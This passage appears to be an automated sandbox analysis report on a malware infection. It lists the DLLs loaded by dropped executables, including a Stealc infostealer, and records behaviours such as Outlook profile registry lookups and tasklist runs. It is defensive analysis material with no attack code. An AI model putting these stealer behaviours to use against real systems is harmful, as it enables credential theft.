Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\197036\Jurisdiction.pif	Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\1000833001\f55899dae2.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1913856 > 1048576

Source: file.exe

Static PE information: Raw size of mahfbdtk is bigger than: 0x100000 < 0x1a1600

